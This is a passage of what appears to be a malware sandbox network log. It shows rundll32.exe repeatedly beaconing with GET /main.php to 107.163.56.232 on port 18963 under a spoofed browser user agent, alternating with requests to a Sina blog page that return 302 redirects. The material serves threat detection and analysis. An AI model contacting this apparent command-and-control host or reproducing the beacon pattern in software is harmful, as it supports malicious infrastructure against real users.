                                                                                                                                                                        22192.168.2.1149752116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:04.236861944 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:45:05.974081039 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:45:05 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        23192.168.2.1149754107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:08.148576021 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        24192.168.2.1149755107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:08.251167059 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        25192.168.2.1149756116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:08.251693964 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:45:09.958744049 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:45:09 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        26192.168.2.1149758107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:12.139372110 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        27192.168.2.1149759107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:12.260761976 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        28192.168.2.1149760116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:12.264594078 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:45:14.117769003 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:45:13 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        29192.168.2.1149762107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:16.153583050 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        30192.168.2.1149763107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:16.264883041 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        31192.168.2.1149764116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:16.267159939 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        32192.168.2.1149765107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:20.171262026 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        33192.168.2.1149766116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:20.300904036 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:45:22.017090082 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:45:21 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        34192.168.2.1149767107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:20.312871933 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        35192.168.2.1149771107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:24.294791937 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        36192.168.2.1149772107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:24.481132984 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        37192.168.2.1149773116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:24.481162071 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:45:26.194787025 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:45:25 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        38192.168.2.1149775107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:28.420633078 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        39192.168.2.1149776107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:28.541662931 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        40192.168.2.1149777116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:28.586559057 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:45:30.985765934 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:45:30 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        41192.168.2.1149779107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:32.443223000 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        42192.168.2.1149780107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:32.563079119 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        43192.168.2.1149781116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:32.565167904 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:45:34.273015022 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:45:34 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        44192.168.2.1149783107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:36.434906006 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        45192.168.2.1149784107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:36.547027111 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        46192.168.2.1149785116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:36.547036886 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:45:38.289331913 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:45:38 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        47192.168.2.1149787107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:40.437948942 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        48192.168.2.1149788107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:40.609720945 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        49192.168.2.1149789116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:40.610619068 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:45:43.137818098 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:45:42 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        50192.168.2.1149792107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:44.559549093 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        51192.168.2.1149793116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:44.672339916 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        52192.168.2.1149794107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
